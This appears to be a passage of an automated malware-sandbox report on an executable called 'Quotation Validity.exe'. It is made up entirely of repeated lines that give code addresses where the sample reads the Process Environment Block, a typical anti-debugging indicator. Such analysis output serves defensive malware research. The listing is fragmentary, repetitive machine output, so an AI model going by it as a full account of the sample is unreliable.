                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B1270 mov eax, dword ptr fs:[00000030h]9_2_013B1270
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B1270 mov eax, dword ptr fs:[00000030h]9_2_013B1270
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01399274 mov eax, dword ptr fs:[00000030h]9_2_01399274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01374260 mov eax, dword ptr fs:[00000030h]9_2_01374260
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01374260 mov eax, dword ptr fs:[00000030h]9_2_01374260
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01374260 mov eax, dword ptr fs:[00000030h]9_2_01374260
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136826B mov eax, dword ptr fs:[00000030h]9_2_0136826B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01445227 mov eax, dword ptr fs:[00000030h]9_2_01445227
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136A250 mov eax, dword ptr fs:[00000030h]9_2_0136A250
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01376259 mov eax, dword ptr fs:[00000030h]9_2_01376259
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369240 mov eax, dword ptr fs:[00000030h]9_2_01369240
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369240 mov eax, dword ptr fs:[00000030h]9_2_01369240
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A724D mov eax, dword ptr fs:[00000030h]9_2_013A724D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F92BC mov eax, dword ptr fs:[00000030h]9_2_013F92BC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F92BC mov eax, dword ptr fs:[00000030h]9_2_013F92BC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F92BC mov ecx, dword ptr fs:[00000030h]9_2_013F92BC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F92BC mov ecx, dword ptr fs:[00000030h]9_2_013F92BC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013802A0 mov eax, dword ptr fs:[00000030h]9_2_013802A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013802A0 mov eax, dword ptr fs:[00000030h]9_2_013802A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013852A0 mov eax, dword ptr fs:[00000030h]9_2_013852A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013852A0 mov eax, dword ptr fs:[00000030h]9_2_013852A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013852A0 mov eax, dword ptr fs:[00000030h]9_2_013852A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013852A0 mov eax, dword ptr fs:[00000030h]9_2_013852A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A329E mov eax, dword ptr fs:[00000030h]9_2_013A329E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A329E mov eax, dword ptr fs:[00000030h]9_2_013A329E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014452E2 mov eax, dword ptr fs:[00000030h]9_2_014452E2
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014212ED mov eax, dword ptr fs:[00000030h]9_2_014212ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142F2F8 mov eax, dword ptr fs:[00000030h]9_2_0142F2F8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F0283 mov eax, dword ptr fs:[00000030h]9_2_013F0283
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F0283 mov eax, dword ptr fs:[00000030h]9_2_013F0283
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F0283 mov eax, dword ptr fs:[00000030h]9_2_013F0283
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE284 mov eax, dword ptr fs:[00000030h]9_2_013AE284
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE284 mov eax, dword ptr fs:[00000030h]9_2_013AE284
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01445283 mov eax, dword ptr fs:[00000030h]9_2_01445283
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013692FF mov eax, dword ptr fs:[00000030h]9_2_013692FF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013802E1 mov eax, dword ptr fs:[00000030h]9_2_013802E1
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013802E1 mov eax, dword ptr fs:[00000030h]9_2_013802E1
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013802E1 mov eax, dword ptr fs:[00000030h]9_2_013802E1
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014072A0 mov eax, dword ptr fs:[00000030h]9_2_014072A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014072A0 mov eax, dword ptr fs:[00000030h]9_2_014072A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014062A0 mov eax, dword ptr fs:[00000030h]9_2_014062A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014062A0 mov ecx, dword ptr fs:[00000030h]9_2_014062A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014062A0 mov eax, dword ptr fs:[00000030h]9_2_014062A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014062A0 mov eax, dword ptr fs:[00000030h]9_2_014062A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014062A0 mov eax, dword ptr fs:[00000030h]9_2_014062A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014062A0 mov eax, dword ptr fs:[00000030h]9_2_014062A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136B2D3 mov eax, dword ptr fs:[00000030h]9_2_0136B2D3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136B2D3 mov eax, dword ptr fs:[00000030h]9_2_0136B2D3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136B2D3 mov eax, dword ptr fs:[00000030h]9_2_0136B2D3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014392A6 mov eax, dword ptr fs:[00000030h]9_2_014392A6
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014392A6 mov eax, dword ptr fs:[00000030h]9_2_014392A6
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014392A6 mov eax, dword ptr fs:[00000030h]9_2_014392A6
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014392A6 mov eax, dword ptr fs:[00000030h]9_2_014392A6
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F2D0 mov eax, dword ptr fs:[00000030h]9_2_0139F2D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F2D0 mov eax, dword ptr fs:[00000030h]9_2_0139F2D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013792C5 mov eax, dword ptr fs:[00000030h]9_2_013792C5
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013792C5 mov eax, dword ptr fs:[00000030h]9_2_013792C5
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A2C3 mov eax, dword ptr fs:[00000030h]9_2_0137A2C3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A2C3 mov eax, dword ptr fs:[00000030h]9_2_0137A2C3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A2C3 mov eax, dword ptr fs:[00000030h]9_2_0137A2C3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A2C3 mov eax, dword ptr fs:[00000030h]9_2_0137A2C3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A2C3 mov eax, dword ptr fs:[00000030h]9_2_0137A2C3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139B2C0 mov eax, dword ptr fs:[00000030h]9_2_0139B2C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139B2C0 mov eax, dword ptr fs:[00000030h]9_2_0139B2C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139B2C0 mov eax, dword ptr fs:[00000030h]9_2_0139B2C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139B2C0 mov eax, dword ptr fs:[00000030h]9_2_0139B2C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139B2C0 mov eax, dword ptr fs:[00000030h]9_2_0139B2C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139B2C0 mov eax, dword ptr fs:[00000030h]9_2_0139B2C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139B2C0 mov eax, dword ptr fs:[00000030h]9_2_0139B2C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137D534 mov eax, dword ptr fs:[00000030h]9_2_0137D534
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137D534 mov eax, dword ptr fs:[00000030h]9_2_0137D534
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137D534 mov eax, dword ptr fs:[00000030h]9_2_0137D534
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137D534 mov eax, dword ptr fs:[00000030h]9_2_0137D534
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137D534 mov eax, dword ptr fs:[00000030h]9_2_0137D534
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137D534 mov eax, dword ptr fs:[00000030h]9_2_0137D534
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E53E mov eax, dword ptr fs:[00000030h]9_2_0139E53E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E53E mov eax, dword ptr fs:[00000030h]9_2_0139E53E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E53E mov eax, dword ptr fs:[00000030h]9_2_0139E53E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E53E mov eax, dword ptr fs:[00000030h]9_2_0139E53E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E53E mov eax, dword ptr fs:[00000030h]9_2_0139E53E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AD530 mov eax, dword ptr fs:[00000030h]9_2_013AD530
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AD530 mov eax, dword ptr fs:[00000030h]9_2_013AD530
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01380535 mov eax, dword ptr fs:[00000030h]9_2_01380535
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01380535 mov eax, dword ptr fs:[00000030h]9_2_01380535
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01380535 mov eax, dword ptr fs:[00000030h]9_2_01380535
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01380535 mov eax, dword ptr fs:[00000030h]9_2_01380535
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01380535 mov eax, dword ptr fs:[00000030h]9_2_01380535
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01380535 mov eax, dword ptr fs:[00000030h]9_2_01380535
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A7505 mov eax, dword ptr fs:[00000030h]9_2_013A7505
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A7505 mov ecx, dword ptr fs:[00000030h]9_2_013A7505
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01444500 mov eax, dword ptr fs:[00000030h]9_2_01444500
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01444500 mov eax, dword ptr fs:[00000030h]9_2_01444500
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01444500 mov eax, dword ptr fs:[00000030h]9_2_01444500
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01444500 mov eax, dword ptr fs:[00000030h]9_2_01444500
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01444500 mov eax, dword ptr fs:[00000030h]9_2_01444500
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01444500 mov eax, dword ptr fs:[00000030h]9_2_01444500
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01444500 mov eax, dword ptr fs:[00000030h]9_2_01444500
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AB570 mov eax, dword ptr fs:[00000030h]9_2_013AB570
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AB570 mov eax, dword ptr fs:[00000030h]9_2_013AB570
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A656A mov eax, dword ptr fs:[00000030h]9_2_013A656A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A656A mov eax, dword ptr fs:[00000030h]9_2_013A656A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A656A mov eax, dword ptr fs:[00000030h]9_2_013A656A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136B562 mov eax, dword ptr fs:[00000030h]9_2_0136B562
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141F525 mov eax, dword ptr fs:[00000030h]9_2_0141F525
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141F525 mov eax, dword ptr fs:[00000030h]9_2_0141F525
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141F525 mov eax, dword ptr fs:[00000030h]9_2_0141F525
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141F525 mov eax, dword ptr fs:[00000030h]9_2_0141F525
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141F525 mov eax, dword ptr fs:[00000030h]9_2_0141F525
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141F525 mov eax, dword ptr fs:[00000030h]9_2_0141F525
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141F525 mov eax, dword ptr fs:[00000030h]9_2_0141F525
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01378550 mov eax, dword ptr fs:[00000030h]9_2_01378550
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01378550 mov eax, dword ptr fs:[00000030h]9_2_01378550
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142B52F mov eax, dword ptr fs:[00000030h]9_2_0142B52F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01445537 mov eax, dword ptr fs:[00000030h]9_2_01445537
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013945B1 mov eax, dword ptr fs:[00000030h]9_2_013945B1
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013945B1 mov eax, dword ptr fs:[00000030h]9_2_013945B1
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F5B0 mov eax, dword ptr fs:[00000030h]9_2_0139F5B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F5B0 mov eax, dword ptr fs:[00000030h]9_2_0139F5B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F5B0 mov eax, dword ptr fs:[00000030h]9_2_0139F5B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F5B0 mov eax, dword ptr fs:[00000030h]9_2_0139F5B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F5B0 mov eax, dword ptr fs:[00000030h]9_2_0139F5B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F5B0 mov eax, dword ptr fs:[00000030h]9_2_0139F5B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F5B0 mov eax, dword ptr fs:[00000030h]9_2_0139F5B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F5B0 mov eax, dword ptr fs:[00000030h]9_2_0139F5B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F5B0 mov eax, dword ptr fs:[00000030h]9_2_0139F5B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014455C9 mov eax, dword ptr fs:[00000030h]9_2_014455C9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013915A9 mov eax, dword ptr fs:[00000030h]9_2_013915A9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013915A9 mov eax, dword ptr fs:[00000030h]9_2_013915A9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013915A9 mov eax, dword ptr fs:[00000030h]9_2_013915A9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013915A9 mov eax, dword ptr fs:[00000030h]9_2_013915A9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013915A9 mov eax, dword ptr fs:[00000030h]9_2_013915A9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014435D7 mov eax, dword ptr fs:[00000030h]9_2_014435D7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014435D7 mov eax, dword ptr fs:[00000030h]9_2_014435D7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014435D7 mov eax, dword ptr fs:[00000030h]9_2_014435D7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F05A7 mov eax, dword ptr fs:[00000030h]9_2_013F05A7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F05A7 mov eax, dword ptr fs:[00000030h]9_2_013F05A7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F05A7 mov eax, dword ptr fs:[00000030h]9_2_013F05A7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE59C mov eax, dword ptr fs:[00000030h]9_2_013AE59C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013FB594 mov eax, dword ptr fs:[00000030h]9_2_013FB594
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013FB594 mov eax, dword ptr fs:[00000030h]9_2_013FB594
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A4588 mov eax, dword ptr fs:[00000030h]9_2_013A4588
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01372582 mov eax, dword ptr fs:[00000030h]9_2_01372582
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01372582 mov ecx, dword ptr fs:[00000030h]9_2_01372582
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136758F mov eax, dword ptr fs:[00000030h]9_2_0136758F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136758F mov eax, dword ptr fs:[00000030h]9_2_0136758F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136758F mov eax, dword ptr fs:[00000030h]9_2_0136758F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013915F4 mov eax, dword ptr fs:[00000030h]9_2_013915F4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013915F4 mov eax, dword ptr fs:[00000030h]9_2_013915F4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013915F4 mov eax, dword ptr fs:[00000030h]9_2_013915F4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013915F4 mov eax, dword ptr fs:[00000030h]9_2_013915F4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013915F4 mov eax, dword ptr fs:[00000030h]9_2_013915F4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013915F4 mov eax, dword ptr fs:[00000030h]9_2_013915F4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AC5ED mov eax, dword ptr fs:[00000030h]9_2_013AC5ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AC5ED mov eax, dword ptr fs:[00000030h]9_2_013AC5ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013725E0 mov eax, dword ptr fs:[00000030h]9_2_013725E0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E5E7 mov eax, dword ptr fs:[00000030h]9_2_0139E5E7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E5E7 mov eax, dword ptr fs:[00000030h]9_2_0139E5E7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E5E7 mov eax, dword ptr fs:[00000030h]9_2_0139E5E7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E5E7 mov eax, dword ptr fs:[00000030h]9_2_0139E5E7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E5E7 mov eax, dword ptr fs:[00000030h]9_2_0139E5E7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E5E7 mov eax, dword ptr fs:[00000030h]9_2_0139E5E7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E5E7 mov eax, dword ptr fs:[00000030h]9_2_0139E5E7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139E5E7 mov eax, dword ptr fs:[00000030h]9_2_0139E5E7
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013995DA mov eax, dword ptr fs:[00000030h]9_2_013995DA
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013765D0 mov eax, dword ptr fs:[00000030h]9_2_013765D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AA5D0 mov eax, dword ptr fs:[00000030h]9_2_013AA5D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AA5D0 mov eax, dword ptr fs:[00000030h]9_2_013AA5D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013ED5D0 mov eax, dword ptr fs:[00000030h]9_2_013ED5D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013ED5D0 mov ecx, dword ptr fs:[00000030h]9_2_013ED5D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE5CF mov eax, dword ptr fs:[00000030h]9_2_013AE5CF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE5CF mov eax, dword ptr fs:[00000030h]9_2_013AE5CF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014035BA mov eax, dword ptr fs:[00000030h]9_2_014035BA
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014035BA mov eax, dword ptr fs:[00000030h]9_2_014035BA
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014035BA mov eax, dword ptr fs:[00000030h]9_2_014035BA
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014035BA mov eax, dword ptr fs:[00000030h]9_2_014035BA
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A55C0 mov eax, dword ptr fs:[00000030h]9_2_013A55C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142F5BE mov eax, dword ptr fs:[00000030h]9_2_0142F5BE
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AA430 mov eax, dword ptr fs:[00000030h]9_2_013AA430
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142F453 mov eax, dword ptr fs:[00000030h]9_2_0142F453
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136C427 mov eax, dword ptr fs:[00000030h]9_2_0136C427
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136E420 mov eax, dword ptr fs:[00000030h]9_2_0136E420
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136E420 mov eax, dword ptr fs:[00000030h]9_2_0136E420
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136E420 mov eax, dword ptr fs:[00000030h]9_2_0136E420
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F6420 mov eax, dword ptr fs:[00000030h]9_2_013F6420
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F6420 mov eax, dword ptr fs:[00000030h]9_2_013F6420
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F6420 mov eax, dword ptr fs:[00000030h]9_2_013F6420
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F6420 mov eax, dword ptr fs:[00000030h]9_2_013F6420
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F6420 mov eax, dword ptr fs:[00000030h]9_2_013F6420
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F6420 mov eax, dword ptr fs:[00000030h]9_2_013F6420
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F6420 mov eax, dword ptr fs:[00000030h]9_2_013F6420
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139340D mov eax, dword ptr fs:[00000030h]9_2_0139340D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A8402 mov eax, dword ptr fs:[00000030h]9_2_013A8402
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A8402 mov eax, dword ptr fs:[00000030h]9_2_013A8402
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A8402 mov eax, dword ptr fs:[00000030h]9_2_013A8402
